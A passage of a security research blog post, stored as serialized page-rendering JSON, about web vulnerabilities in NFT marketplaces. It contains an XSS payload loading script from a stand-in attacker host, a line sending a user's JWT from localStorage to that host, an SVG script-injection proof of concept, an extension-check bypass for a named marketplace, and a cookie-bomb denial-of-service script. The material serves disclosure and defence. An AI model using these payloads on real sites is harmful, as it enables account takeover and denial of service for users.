ag":116,"props":33291,"children":33292},{"class":245,"line":713},[33293],{"type":28,"tag":116,"props":33294,"children":33295},{"emptyLinePlaceholder":19},[33296],{"type":33,"value":1044},{"type":28,"tag":116,"props":33298,"children":33299},{"class":245,"line":750},[33300,33304,33308],{"type":28,"tag":116,"props":33301,"children":33302},{"style":488},[33303],{"type":33,"value":32040},{"type":28,"tag":116,"props":33305,"children":33306},{"style":376},[33307],{"type":33,"value":789},{"type":28,"tag":116,"props":33309,"children":33310},{"style":488},[33311],{"type":33,"value":506},{"type":28,"tag":116,"props":33313,"children":33314},{"class":245,"line":779},[33315],{"type":28,"tag":116,"props":33316,"children":33317},{"emptyLinePlaceholder":19},[33318],{"type":33,"value":1044},{"type":28,"tag":116,"props":33320,"children":33321},{"class":245,"line":796},[33322,33326],{"type":28,"tag":116,"props":33323,"children":33324},{"style":266},[33325],{"type":33,"value":32526},{"type":28,"tag":116,"props":33327,"children":33328},{"style":376},[33329],{"type":33,"value":10547},{"type":28,"tag":116,"props":33331,"children":33332},{"class":245,"line":847},[33333,33337,33341,33345,33349,33353,33357,33361,33365,33369,33373,33377],{"type":28,"tag":116,"props":33334,"children":33335},{"style":272},[33336],{"type":33,"value":32538},{"type":28,"tag":116,"props":33338,"children":33339},{"style":272},[33340],{"type":33,"value":32543},{"type":28,"tag":116,"props":33342,"children":33343},{"style":370},[33344],{"type":33,"value":926},{"type":28,"tag":116,"props":33346,"children":33347},{"style":260},[33348],{"type":33,"value":1091},{"type":28,"tag":116,"props":33350,"children":33351},{"style":370},[33352],{"type":33,"value":269},{"type":28,"tag":116,"props":33354,"children":33355},{"style":260},[33356],{"type":33,"value":1091},{"type":28,"tag":116,"props":33358,"children":33359},{"style":282},[33360],{"type":33,"value":32564},{"type":28,"tag":116,"props":33362,"children":33363},{"style":370},[33364],{"type":33,"value":313},{"type":28,"tag":116,"props":33366,"children":33367},{"style":563},[33368],{"type":33,"value":32573},{"type":28,"tag":116,"props":33370,"children":33371},{"style":370},[33372],{"type":33,"value":32578},{"type":28,"tag":116,"props":33374,"children":33375},{"style":282},[33376],{"type":33,"value":1604},{"type":28,"tag":116,"props":33378,"children":33379},{"style":370},[33380],{"type":33,"value":7407},{"type":28,"tag":116,"props":33382,"children":33383},{"class":245,"line":898},[33384],{"type":28,"tag":116,"props":33385,"children":33386},{"emptyLinePlaceholder":19},[33387],{"type":33,"value":1044},{"type":28,"tag":116,"props":33389,"children":33390},{"class":245,"line":907},[33391,33395,33399,33403,33407,33411,33415,33419,33423,33427,33431,33435,33439],{"type":28,"tag":116,"props":33392,"children":33393},{"style":272},[33394],{"type":33,"value":2736},{"type":28,"tag":116,"props":33396,"children":33397},{"style":272},[33398],{"type":33,"value":32605},{"type":28,"tag":116,"props":33400,"children":33401},{"style":370},[33402],{"type":33,"value":926},{"type":28,"tag":116,"props":33404,"children":33405},{"style":376},[33406],{"type":33,"value":336},{"type":28,"tag":116,"props":33408,"children":33409},{"style":282},[33410],{"type":33,"value":32618},{"type":28,"tag":116,"props":33412,"children":33413},{"style":370},[33414],{"type":33,"value":32623},{"type":28,"tag":116,"props":33416,"children":33417},{"style":272},[33418],{"type":33,"value":1604},{"type":28,"tag":116,"props":33420,"children":33421},{"style":370},[33422],{"type":33,"value":22723},{"type":28,"tag":116,"props":33424,"children":33425},{"style":563},[33426],{"type":33,"value":32636},{"type":28,"tag":116,"props":33428,"children":33429},{"style":370},[33430],{"type":33,"value":32641},{"type":28,"tag":116,"props":33432,"children":33433},{"style":272},[33434],{"type":33,"value":32646},{"type":28,"tag":116,"props":33436,"children":33437},{"style":563},[33438],{"type":33,"value":32651},{"type":28,"tag":116,"props":33440,"children":33441},{"style":370},[33442],{"type":33,"value":32656},{"type":28,"tag":116,"props":33444,"children":33445},{"class":245,"line":981},[33446,33450,33454,33458,33462,33466],{"type":28,"tag":116,"props":33447,"children":33448},{"style":272},[33449],{"type":33,"value":32538},{"type":28,"tag":116,"props":33451,"children":33452},{"style":272},[33453],{"type":33,"value":32668},{"type":28,"tag":116,"props":33455,"children":33456},{"style":370},[33457],{"type":33,"value":926},{"type":28,"tag":116,"props":33459,"children":33460},{"style":376},[33461],{"type":33,"value":336},{"type":28,"tag":116,"props":33463,"children":33464},{"style":282},[33465],{"type":33,"value":32681},{"type":28,"tag":116,"props":33467,"children":33468},{"style":370},[33469],{"type":33,"value":1445},{"type":28,"tag":116,"props":33471,"children":33472},{"class":245,"line":1011},[33473,33477,33481,33485,33489,33493,33497,33501],{"type":28,"tag":116,"props":33474,"children":33475},{"style":272},[33476],{"type":33,"value":32693},{"type":28,"tag":116,"props":33478,"children":33479},{"style":370},[33480],{"type":33,"value":141},{"type":28,"tag":116,"props":33482,"children":33483},{"style":272},[33484],{"type":33,"value":32702},{"type":28,"tag":116,"props":33486,"children":33487},{"style":370},[33488],{"type":33,"value":141},{"type":28,"tag":116,"props":33490,"children":33491},{"style":282},[33492],{"type":33,"value":9306},{"type":28,"tag":116,"props":33494,"children":33495},{"style":370},[33496],{"type":33,"value":313},{"type":28,"tag":116,"props":33498,"children":33499},{"style":272},[33500],{"type":33,"value":32719},{"type":28,"tag":116,"props":33502,"children":33503},{"style":370},[33504],{"type":33,"value":895},{"type":28,"tag":116,"props":33506,"children":33507},{"class":245,"line":1029},[33508],{"type":28,"tag":116,"props":33509,"children":33510},{"emptyLinePlaceholder":19},[33511],{"type":33,"value":1044},{"type":28,"tag":116,"props":33513,"children":33514},{"class":245,"line":1038},[33515,33519,33523,33527,33531,33535,33539,33543],{"type":28,"tag":116,"props":33516,"children":33517},{"style":272},[33518],{"type":33,"value":32738},{"type":28,"tag":116,"props":33520,"children":33521},{"style":370},[33522],{"type":33,"value":141},{"type":28,"tag":116,"props":33524,"children":33525},{"style":272},[33526],{"type":33,"value":32747},{"type":28,"tag":116,"props":33528,"children":33529},{"style":370},[33530],{"type":33,"value":926},{"type":28,"tag":116,"props":33532,"children":33533},{"style":272},[33534],{"type":33,"value":32756},{"type":28,"tag":116,"props":33536,"children":33537},{"style":370},[33538],{"type":33,"value":141},{"type":28,"tag":116,"props":33540,"children":33541},{"style":272},[33542],{"type":33,"value":32747},{"type":28,"tag":116,"props":33544,"children":33545},{"style":370},[33546],{"type":33,"value":384},{"type":28,"tag":116,"props":33548,"children":33549},{"class":245,"line":1047},[33550],{"type":28,"tag":116,"props":33551,"children":33552},{"emptyLinePlaceholder":19},[33553],{"type":33,"value":1044},{"type":28,"tag":116,"props":33555,"children":33556},{"class":245,"line":1071},[33557,33562,33566,33571],{"type":28,"tag":116,"props":33558,"children":33559},{"style":272},[33560],{"type":33,"value":33561},"        form123",{"type":28,"tag":116,"props":33563,"children":33564},{"style":370},[33565],{"type":33,"value":141},{"type":28,"tag":116,"props":33567,"children":33568},{"style":282},[33569],{"type":33,"value":33570},"submit",{"type":28,"tag":116,"props":33572,"children":33573},{"style":370},[33574],{"type":33,"value":7407},{"type":28,"tag":116,"props":33576,"children":33577},{"class":245,"line":1137},[33578,33582],{"type":28,"tag":116,"props":33579,"children":33580},{"style":376},[33581],{"type":33,"value":32776},{"type":28,"tag":116,"props":33583,"children":33584},{"style":266},[33585],{"type":33,"value":32781},{"type":28,"tag":116,"props":33587,"children":33588},{"class":245,"line":1181},[33589],{"type":28,"tag":116,"props":33590,"children":33591},{"emptyLinePlaceholder":19},[33592],{"type":33,"value":1044},{"type":28,"tag":116,"props":33594,"children":33595},{"class":245,"line":1212},[33596,33600,33604],{"type":28,"tag":116,"props":33597,"children":33598},{"style":488},[33599],{"type":33,"value":32481},{"type":28,"tag":116,"props":33601,"children":33602},{"style":376},[33603],{"type":33,"value":789},{"type":28,"tag":116,"props":33605,"children":33606},{"style":488},[33607],{"type":33,"value":506},{"type":28,"tag":116,"props":33609,"children":33610},{"class":245,"line":1254},[33611,33615,33619],{"type":28,"tag":116,"props":33612,"children":33613},{"style":488},[33614],{"type":33,"value":603},{"type":28,"tag":116,"props":33616,"children":33617},{"style":376},[33618],{"type":33,"value":478},{"type":28,"tag":116,"props":33620,"children":33621},{"style":488},[33622],{"type":33,"value":506},{"type":28,"tag":29,"props":33624,"children":33625},{},[33626],{"type":33,"value":33627},"This script automatically sends the following config in POST body, which triggers the XSS and imports a malicious javascript file from attacker's server:",{"type":28,"tag":234,"props":33629,"children":33633},{"className":33630,"code":33631,"language":33632,"meta":7,"style":7},"language-json shiki shiki-themes slack-dark","{\n  \"address\": \"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\",\n  \"to\": \"profile-assets\",\n  \"type\": \"icon\"\n}\n","json",[33634],{"type":28,"tag":98,"props":33635,"children":33636},{"__ignoreMap":7},[33637,33644,33665,33686,33703],{"type":28,"tag":116,"props":33638,"children":33639},{"class":245,"line":246},[33640],{"type":28,"tag":116,"props":33641,"children":33642},{"style":266},[33643],{"type":33,"value":10547},{"type":28,"tag":116,"props":33645,"children":33646},{"class":245,"line":256},[33647,33652,33656,33661],{"type":28,"tag":116,"props":33648,"children":33649},{"style":272},[33650],{"type":33,"value":33651},"  \"address\"",{"type":28,"tag":116,"props":33653,"children":33654},{"style":266},[33655],{"type":33,"value":14994},{"type":28,"tag":116,"props":33657,"children":33658},{"style":563},[33659],{"type":33,"value":33660},"\"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\"",{"type":28,"tag":116,"props":33662,"children":33663},{"style":266},[33664],{"type":33,"value":3178},{"type":28,"tag":116,"props":33666,"children":33667},{"class":245,"line":293},[33668,33673,33677,33682],{"type":28,"tag":116,"props":33669,"children":33670},{"style":272},[33671],{"type":33,"value":33672},"  \"to\"",{"type":28,"tag":116,"props":33674,"children":33675},{"style":266},[33676],{"type":33,"value":14994},{"type":28,"tag":116,"props":33678,"children":33679},{"style":563},[33680],{"type":33,"value":33681},"\"profile-assets\"",{"type":28,"tag":116,"props":33683,"children":33684},{"style":266},[33685],{"type":33,"value":3178},{"type":28,"tag":116,"props":33687,"children":33688},{"class":245,"line":361},[33689,33694,33698],{"type":28,"tag":116,"props":33690,"children":33691},{"style":272},[33692],{"type":33,"value":33693},"  \"type\"",{"type":28,"tag":116,"props":33695,"children":33696},{"style":266},[33697],{"type":33,"value":14994},{"type":28,"tag":116,"props":33699,"children":33700},{"style":563},[33701],{"type":33,"value":33702},"\"icon\"\n",{"type":28,"tag":116,"props":33704,"children":33705},{"class":245,"line":387},[33706],{"type":28,"tag":116,"props":33707,"children":33708},{"style":266},[33709],{"type":33,"value":406},{"type":28,"tag":29,"props":33711,"children":33712},{},[33713],{"type":33,"value":33714},"Then, the imported script is able to exfiltrate the JWT authentication token from stashh.io:",{"type":28,"tag":234,"props":33716,"children":33718},{"className":31015,"code":33717,"language":31017,"meta":7,"style":7},"fetch(`https://attacker-server.com/?token_leak=${localStorage.getItem('token')}`);\n",[33719],{"type":28,"tag":98,"props":33720,"children":33721},{"__ignoreMap":7},[33722],{"type":28,"tag":116,"props":33723,"children":33724},{"class":245,"line":246},[33725,33730,33734,33739,33743,33748,33752,33757,33761,33766,33770,33774,33778],{"type":28,"tag":116,"props":33726,"children":33727},{"style":282},[33728],{"type":33,"value":33729},"fetch",{"type":28,"tag":116,"props":33731,"children":33732},{"style":266},[33733],{"type":33,"value":313},{"type":28,"tag":116,"props":33735,"children":33736},{"style":563},[33737],{"type":33,"value":33738},"`https://attacker-server.com/?token_leak=",{"type":28,"tag":116,"props":33740,"children":33741},{"style":376},[33742],{"type":33,"value":867},{"type":28,"tag":116,"props":33744,"children":33745},{"style":272},[33746],{"type":33,"value":33747},"localStorage",{"type":28,"tag":116,"props":33749,"children":33750},{"style":370},[33751],{"type":33,"value":141},{"type":28,"tag":116,"props":33753,"children":33754},{"style":282},[33755],{"type":33,"value":33756},"getItem",{"type":28,"tag":116,"props":33758,"children":33759},{"style":370},[33760],{"type":33,"value":313},{"type":28,"tag":116,"props":33762,"children":33763},{"style":563},[33764],{"type":33,"value":33765},"'token'",{"type":28,"tag":116,"props":33767,"children":33768},{"style":370},[33769],{"type":33,"value":1829},{"type":28,"tag":116,"props":33771,"children":33772},{"style":376},[33773],{"type":33,"value":885},{"type":28,"tag":116,"props":33775,"children":33776},{"style":563},[33777],{"type":33,"value":890},{"type":28,"tag":116,"props":33779,"children":33780},{"style":266},[33781],{"type":33,"value":895},{"type":28,"tag":75,"props":33783,"children":33785},{"id":33784},"svgs",[33786],{"type":33,"value":33787},"SVGs",{"type":28,"tag":29,"props":33789,"children":33790},{},[33791],{"type":33,"value":33792},"After closely analyzing various NFT marketplaces, we noticed a common shared feature; the ability to update profile pictures or insert NFT assets using SVG files. SVG is an XML- based format that defines graphics and how they interact.",{"type":28,"tag":29,"props":33794,"children":33795},{},[33796],{"type":33,"value":33797},"Unbeknownst to some people, SVG files can contain JavaScript and run arbitrary scripts.",{"type":28,"tag":234,"props":33799,"children":33801},{"className":31015,"code":33800,"language":31017,"meta":7,"style":7},"\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n  \u003Ctitle>XSS\u003C/title>\n  \u003Cscript type=\"text/javascript\">\n   alert(document.domain);\n   \u003C/script>\n \u003C/svg>\n",[33802],{"type":28,"tag":98,"props":33803,"children":33804},{"__ignoreMap":7},[33805,33851,33886,33893,33923,33954,33982,33990,34006],{"type":28,"tag":116,"props":33806,"children":33807},{"class":245,"line":246},[33808,33813,33818,33823,33827,33832,33837,33841,33846],{"type":28,"tag":116,"props":33809,"children":33810},{"style":370},[33811],{"type":33,"value":33812},"\u003C?",{"type":28,"tag":116,"props":33814,"children":33815},{"style":272},[33816],{"type":33,"value":33817},"xml",{"type":28,"tag":116,"props":33819,"children":33820},{"style":272},[33821],{"type":33,"value":33822}," version",{"type":28,"tag":116,"props":33824,"children":33825},{"style":370},[33826],{"type":33,"value":373},{"type":28,"tag":116,"props":33828,"children":33829},{"style":563},[33830],{"type":33,"value":33831},"\"1.0\"",{"type":28,"tag":116,"props":33833,"children":33834},{"style":272},[33835],{"type":33,"value":33836}," encoding",{"type":28,"tag":116,"props":33838,"children":33839},{"style":370},[33840],{"type":33,"value":373},{"type":28,"tag":116,"props":33842,"children":33843},{"style":563},[33844],{"type":33,"value":33845},"\"UTF-8\"",{"type":28,"tag":116,"props":33847,"children":33848},{"style":370},[33849],{"type":33,"value":33850},"?>\n",{"type":28,"tag":116,"props":33852,"children":33853},{"class":245,"line":256},[33854,33858,33862,33867,33872,33877,33882],{"type":28,"tag":116,"props":33855,"children":33856},{"style":370},[33857],{"type":33,"value":491},{"type":28,"tag":116,"props":33859,"children":33860},{"style":272},[33861],{"type":33,"value":496},{"type":28,"tag":116,"props":33863,"children":33864},{"style":272},[33865],{"type":33,"value":33866}," svg",{"type":28,"tag":116,"props":33868,"children":33869},{"style":272},[33870],{"type":33,"value":33871}," PUBLIC",{"type":28,"tag":116,"props":33873,"children":33874},{"style":563},[33875],{"type":33,"value":33876}," \"-//W3C//DTD SVG 1.1//EN\"",{"type":28,"tag":116,"props":33878,"children":33879},{"style":563},[33880],{"type":33,"value":33881}," \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"",{"type":28,"tag":116,"props":33883,"children":33884},{"style":370},[33885],{"type":33,"value":506},{"type":28,"tag":116,"props":33887,"children":33888},{"class":245,"line":293},[33889],{"type":28,"tag":116,"props":33890,"children":33891},{"emptyLinePlaceholder":19},[33892],{"type":33,"value":1044},{"type":28,"tag":116,"props":33894,"children":33895},{"class":245,"line":361},[33896,33900,33905,33910,33914,33919],{"type":28,"tag":116,"props":33897,"children":33898},{"style":488},[33899],{"type":33,"value":8391},{"type":28,"tag":116,"props":33901,"children":33902},{"style":376},[33903],{"type":33,"value":33904},"svg",{"type":28,"tag":116,"props":33906,"children":33907},{"style":272},[33908],{"type":33,"value":33909}," xmlns",{"type":28,"tag":116,"props":33911,"children":33912},{"style":370},[33913],{"type":33,"value":373},{"type":28,"tag":116,"props":33915,"children":33916},{"style":563},[33917],{"type":33,"value":33918},"\"http://www.w3.org/2000/svg\"",{"type":28,"tag":116,"props":33920,"children":33921},{"style":488},[33922],{"type":33,"value":506},{"type":28,"tag":116,"props":33924,"children":33925},{"class":245,"line":387},[33926,33930,33934,33938,33942,33946,33950],{"type":28,"tag":116,"props":33927,"children":33928},{"style":488},[33929],{"type":33,"value":32040},{"type":28,"tag":116,"props":33931,"children":33932},{"style":376},[33933],{"type":33,"value":582},{"type":28,"tag":116,"props":33935,"children":33936},{"style":488},[33937],{"type":33,"value":645},{"type":28,"tag":116,"props":33939,"children":33940},{"style":266},[33941],{"type":33,"value":30891},{"type":28,"tag":116,"props":33943,"children":33944},{"style":488},[33945],{"type":33,"value":603},{"type":28,"tag":116,"props":33947,"children":33948},{"style":376},[33949],{"type":33,"value":582},{"type":28,"tag":116,"props":33951,"children":33952},{"style":488},[33953],{"type":33,"value":506},{"type":28,"tag":116,"props":33955,"children":33956},{"class":245,"line":400},[33957,33961,33965,33969,33973,33978],{"type":28,"tag":116,"props":33958,"children":33959},{"style":488},[33960],{"type":33,"value":32040},{"type":28,"tag":116,"props":33962,"children":33963},{"style":376},[33964],{"type":33,"value":789},{"type":28,"tag":116,"props":33966,"children":33967},{"style":272},[33968],{"type":33,"value":32181},{"type":28,"tag":116,"props":33970,"children":33971},{"style":370},[33972],{"type":33,"value":373},{"type":28,"tag":116,"props":33974,"children":33975},{"style":563},[33976],{"type":33,"value":33977},"\"text/javascript\"",{"type":28,"tag":116,"props":33979,"children":33980},{"style":488},[33981],{"type":33,"value":506},{"type":28,"tag":116,"props":33983,"children":33984},{"class":245,"line":614},[33985],{"type":28,"tag":116,"props":33986,"children":33987},{"style":266},[33988],{"type":33,"value":33989},"   alert(document.domain);\n",{"type":28,"tag":116,"props":33991,"children":33992},{"class":245,"line":631},[33993,33998,34002],{"type":28,"tag":116,"props":33994,"children":33995},{"style":488},[33996],{"type":33,"value":33997},"   \u003C/",{"type":28,"tag":116,"props":33999,"children":34000},{"style":376},[34001],{"type":33,"value":789},{"type":28,"tag":116,"props":34003,"children":34004},{"style":488},[34005],{"type":33,"value":506},{"type":28,"tag":116,"props":34007,"children":34008},{"class":245,"line":665},[34009,34014,34018],{"type":28,"tag":116,"props":34010,"children":34011},{"style":488},[34012],{"type":33,"value":34013}," \u003C/",{"type":28,"tag":116,"props":34015,"children":34016},{"style":376},[34017],{"type":33,"value":33904},{"type":28,"tag":116,"props":34019,"children":34020},{"style":488},[34021],{"type":33,"value":506},{"type":28,"tag":29,"props":34023,"children":34024},{},[34025,34027,34034],{"type":33,"value":34026},"Although some marketplaces restrict the upload of SVG files, we discovered a way to bypass these checks. One particular instance involved the ",{"type":28,"tag":87,"props":34028,"children":34031},{"href":34029,"rel":34030},"https://xtingles.com/",[91],[34032],{"type":33,"value":34033},"xtingles Marketplace",{"type":33,"value":141},{"type":28,"tag":29,"props":34036,"children":34037},{},[34038],{"type":33,"value":34039},"Even though the file extension was validated based on its name, the content type was not checked. By renaming a file with an allowed extension and inserting an SVG file with the content type \"svg+xml,\", we were able to successfully upload the SVG file.",{"type":28,"tag":29,"props":34041,"children":34042},{},[34043],{"type":33,"value":34044},"Below, we show you how we did it.",{"type":28,"tag":29,"props":34046,"children":34047},{},[34048],{"type":33,"value":34049},"Request when the original SVG was sent, showing it is not accepted as format:",{"type":28,"tag":29,"props":34051,"children":34052},{},[34053],{"type":28,"tag":206,"props":34054,"children":34056},{"alt":7,"src":34055},"/posts/web2-bug-repellant-instructions/svg-1.png",[],{"type":28,"tag":29,"props":34058,"children":34059},{},[34060],{"type":33,"value":34061},"After changing the extension inside the file name.",{"type":28,"tag":29,"props":34063,"children":34064},{},[34065],{"type":28,"tag":206,"props":34066,"children":34068},{"alt":7,"src":34067},"/posts/web2-bug-repellant-instructions/svg-2.png",[],{"type":28,"tag":75,"props":34070,"children":34072},{"id":34071},"svgs-return",[34073],{"type":33,"value":34074},"SVGs Return",{"type":28,"tag":29,"props":34076,"children":34077},{},[34078],{"type":33,"value":34079},"We'll give credit where it's due. Some marketplaces mitigate the impact of XSS by storing images in IPFS, Amazon S3 buckets, or CloudFront.",{"type":28,"tag":29,"props":34081,"children":34082},{},[34083],{"type":33,"value":34084},"Unfortunately, this mitigation is still susceptible to a \"cookie bomb\" attack.",{"type":28,"tag":29,"props":34086,"children":34087},{},[34088],{"type":33,"value":34089},"This type of attack overwhelms a web server with an excessive number of cookies and can be used to achieve a Denial of Service (DoS), preventing users from accessing the file on the third-party service.",{"type":28,"tag":234,"props":34091,"children":34095},{"className":34092,"code":34093,"language":34094,"meta":7,"style":7},"language-jsx shiki shiki-themes slack-dark","\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n  \u003Ctitle>XSS\u003C/title>\n  \u003Cscript type=\"text/javascript\">\n   var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n   var Set_Cookie = Array(10000).join('a');\n\n   for (var i = 1; i \u003C 99; i++) {\n    document.cookie = 'Cookie' + i + '=' + Set_Cookie + ';Domain=' + Take_Domain;\n   }\n   \u003C/script>\n \u003C/svg>\n","jsx",[34096],{"type":28,"tag":98,"props":34097,"children":34098},{"__ignoreMap":7},[34099,34138,34169,34176,34203,34234,34261,34269,34277,34284,34296,34370,34378,34393],{"type":28,"tag":116,"props":34100,"children":34101},{"class":245,"line":246},[34102,34106,34110,34114,34118,34122,34126,34130,34134],{"type":28,"tag":116,"props":34103,"children":34104},{"style":370},[34105],{"type":33,"value":33812},{"type":28,"tag":116,"props":34107,"children":34108},{"style":272},[34109],{"type":33,"value":33817},{"type":28,"tag":116,"props":34111,"children":34112},{"style":272},[34113],{"type":33,"value":33822},{"type":28,"tag":116,"props":34115,"children":34116},{"style":370},[34117],{"type":33,"value":373},{"type":28,"tag":116,"props":34119,"children":34120},{"style":563},[34121],{"type":33,"value":33831},{"type":28,"tag":116,"props":34123,"children":34124},{"style":272},[34125],{"type":33,"value":33836},{"type":28,"tag":116,"props":34127,"children":34128},{"style":370},[34129],{"type":33,"value":373},{"type":28,"tag":116,"props":34131,"children":34132},{"style":563},[34133],{"type":33,"value":33845},{"type":28,"tag":116,"props":34135,"children":34136},{"style":370},[34137],{"type":33,"value":33850},{"type":28,"tag":116,"props":34139,"children":34140},{"class":245,"line":256},[34141,34145,34149,34153,34157,34161,34165],{"type":28,"tag":116,"props":34142,"children":34143},{"style":370},[34144],{"type":33,"value":491},{"type":28,"tag":116,"props":34146,"children":34147},{"style":272},[34148],{"type":33,"value":496},{"type":28,"tag":116,"props":34150,"children":34151},{"style":272},[34152],{"type":33,"value":33866},{"type":28,"tag":116,"props":34154,"children":34155},{"style":272},[34156],{"type":33,"value":33871},{"type":28,"tag":116,"props":34158,"children":34159},{"style":563},[34160],{"type":33,"value":33876},{"type":28,"tag":116,"props":34162,"children":34163},{"style":563},[34164],{"type":33,"value":33881},{"type":28,"tag":116,"props":34166,"children":34167},{"style":370},[34168],{"type":33,"value":506},{"type":28,"tag":116,"props":34170,"children":34171},{"class":245,"line":293},[34172],{"type":28,"tag":116,"props":34173,"children":34174},{"emptyLinePlaceholder":19},[34175],{"type":33,"value":1044},{"type":28,"tag":116,"props":34177,"children":34178},{"class":245,"line":361},[34179,34183,34187,34191,34195,34199],{"type":28,"tag":116,"props":34180,"children":34181},{"style":488},[34182],{"type":33,"value":8391},{"type":28,"tag":116,"props":34184,"children":34185},{"style":376},[34186],{"type":33,"value":33904},{"type":28,"tag":116,"props":34188,"children":34189},{"style":272},[34190],{"type":33,"value":33909},{"type":28,"tag":116,"props":34192,"children":34193},{"style":370},[34194],{"type":33,"value":373},{"type":28,"tag":116,"props":34196,"children":34197},{"style":563},[34198],{"type":33,"value":33918},{"type":28,"tag":116,"props":34200,"children":34201},{"style":488},[34202],{"type":33,"value":506},{"type":28,"tag":116,"props":34204,"children":34205},{"class":245,"line":387},[34206,34210,34214,34218,34222,34226,34230],{"type":28,"tag":116,"props":34207,"children":34208},{"style":488},[34209],{"type":33,"value":32040},{"type":28,"tag":116,"props":34211,"children":34212},{"style":376},[34213],{"type":33,"value":582},{"type":28,"tag":116,"props":34215,"children":34216},{"style":488},[34217],{"type":33,"value":645},{"type":28,"tag":116,"props":34219,"children":34220},{"style":266},[34221],{"type":33,"value":30891},{"type":28,"tag":116,"props":34223,"children":34224},{"style":488},[34225],{"type":33,"value":603},{"type":28,"tag":116,"props":34227,"children":34228},{"style":376},[34229],{"type":33,"value":582},{"type":28,"tag":116,"props":34231,"children":34232},{"style":488},[34233],{"type":33,"value":506},{"type":28,"tag":116,"props":34235,"children":34236},{"class":245,"line":400},[34237,34241,34245,34249,34253,34257],{"type":28,"tag":116,"props":34238,"children":34239},{"style":488},[34240],{"type":33,"value":32040},{"type":28,"tag":116,"props":34242,"children":34243},{"style":376},[34244],{"type":33,"value":789},{"type":28,"tag":116,"props":34246,"children":34247},{"style":272},[34248],{"type":33,"value":32181},{"type":28,"tag":116,"props":34250,"children":34251},{"style":370},[34252],{"type":33,"value":373},{"type":28,"tag":116,"props":34254,"children":34255},{"style":563},[34256],{"type":33,"value":33977},{"type":28,"tag":116,"props":34258,"children":34259},{"style":488},[34260],{"type":33,"value":506},{"type":28,"tag":116,"props":34262,"children":34263},{"class":245,"line":614},[34264],{"type":28,"tag":116,"props":34265,"children":34266},{"style":266},[34267],{"type":33,"value":34268},"   var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n",{"type":28,"tag":116,"props":34270,"children":34271},{"class":245,"line":631},[34272],{"type":28,"tag":116,"props":34273,"children":34274},{"style":266},[34275],{"type":33,"value":34276},"   var Set_Cookie = Array(10000).join('a');\n",{"type":28,"tag":116,"props":34278,"children":34279},{"class":245,"line":665},[34280],{"type":28,"tag":116,"props":34281,"children":34282},{"emptyLinePlaceholder":19},[34283],{"type":33,"value":1044},{"type":28,"tag":116,"props":34285,"children":34286},{"class":245,"line":713},[34287,34292],{"type":28,"tag":116,"props":34288,"children":34289},{"style":266},[34290],{"type":33,"value":34291},"   for (var i = 1; i \u003C 99; i++) ",{"type":28,"tag":116,"props":34293,"children":34294},{"style":376},[34295],{"type":33,"value":10547},{"type":28,"tag":116,"props":34297,"children":34298},{"class":245,"line":750},[34299,34304,34308,34313,34317,34322,34326,34330,34334,34339,34343,34348,34352,34357,34361,34366],{"type":28,"tag":116,"props":34300,"children":34301},{"style":272},[34302],{"type":33,"value":34303},"    document",{"type":28,"tag":116,"props":34305,"children":34306},{"style":370},[34307],{"type":33,"value":141},{"type":28,"tag":116,"props":34309,"children":34310},{"style":272},[34311],{"type":33,"value":34312},"cookie",{"type":28,"tag":116,"props":34314,"children":34315},{"style":370},[34316],{"type":33,"value":926},{"type":28,"tag":116,"props":34318,"children":34319},{"style":563},[34320],{"type":33,"value":34321},"'Cookie'",{"type":28,"tag":116,"props":34323,"children":34324},{"style":370},[34325],{"type":33,"value":1000},{"type":28,"tag":116,"props":34327,"children":34328},{"style":272},[34329],{"type":33,"value":3408},{"type":28,"tag":116,"props":34331,"children":34332},{"style":370},[34333],{"type":33,"value":1000},{"type":28,"tag":116,"props":34335,"children":34336},{"style":563},[34337],{"type":33,"value":34338},"'='",{"type":28,"tag":116,"props":34340,"children":34341},{"style":370},[34342],{"type":33,"value":1000},{"type":28,"tag":116,"props":34344,"children":34345},{"style":272},[34346],{"type":33,"value":34347},"Set_Cookie",{"type":28,"tag":116,"props":34349,"children":34350},{"style":370},[34351],{"type":33,"value":1000},{"type":28,"tag":116,"props":34353,"children":34354},{"style":563},[34355],{"type":33,"value":34356},"';Domain='",{"type":28,"tag":116,"props":34358,"children":34359},{"style":370},[34360],{"type":33,"value":1000},{"type":28,"tag":116,"props":34362,"children":34363},{"style":272},[34364],{"type":33,"value":34365},"Take_Domain",{"type":28,"tag":116,"props":34367,"children":34368},{"style":370},[34369],{"type":33,"value":384},{"type":28,"tag":116,"props":34371,"children":34372},{"class":245,"line":779},[34373],{"type":28,"tag":116,"props":34374,"children":34375},{"style":376},[34376],{"type":33,"value":34377},"   }\n",{"type":28,"tag":116,"props":34379,"children":34380},{"class":245,"line":796},[34381,34385,34389],{"type":28,"tag":116,"props":34382,"children":34383},{"style":488},[34384],{"type":33,"value":33997},{"type":28,"tag":116,"props":34386,"children":34387},{"style":376},[34388],{"type":33,"value":789},{"type":28,"tag":116,"props":34390,"children":34391},{"style":488},[34392],{"type":33,"value":506},{"type":28,"tag":116,"props":34394,"children":34395},{"class":245,"line":847},[34396,34400,34404],{"type":28,"tag":116,"props":34397,"children":34398},{"style":488},[34399],{"type":33,"value":34013},{"type":28,"tag":116,"props":34401,"children":34402},{"style":376},[34403],{"type":33,"value":33904},{"type":28,"tag":116,"props":34405,"children":34406},{"style":488},[34407],{"type":33,"value":506},{"type":28,"tag":29,"props":34409,"children":34410},{},[34411],{"type":33,"value":34412},"As a result, we're able to prevent the user from loading images.",{"type":28,"tag":63,"props":34414,"children":34416},{"id":34415},"authentication",[34417],{"type":33,"value":34418},"Authentication",{"type":28,"tag":29,"props":34420,"children":34421},{},[34422],{"type":28,"tag":2583,"props":34423,"children":34424},{},[34425,34427,34434],{"type":33,"value":34426},"The door could not be heard slamming; they had probably left it open, as is the custom in homes where a 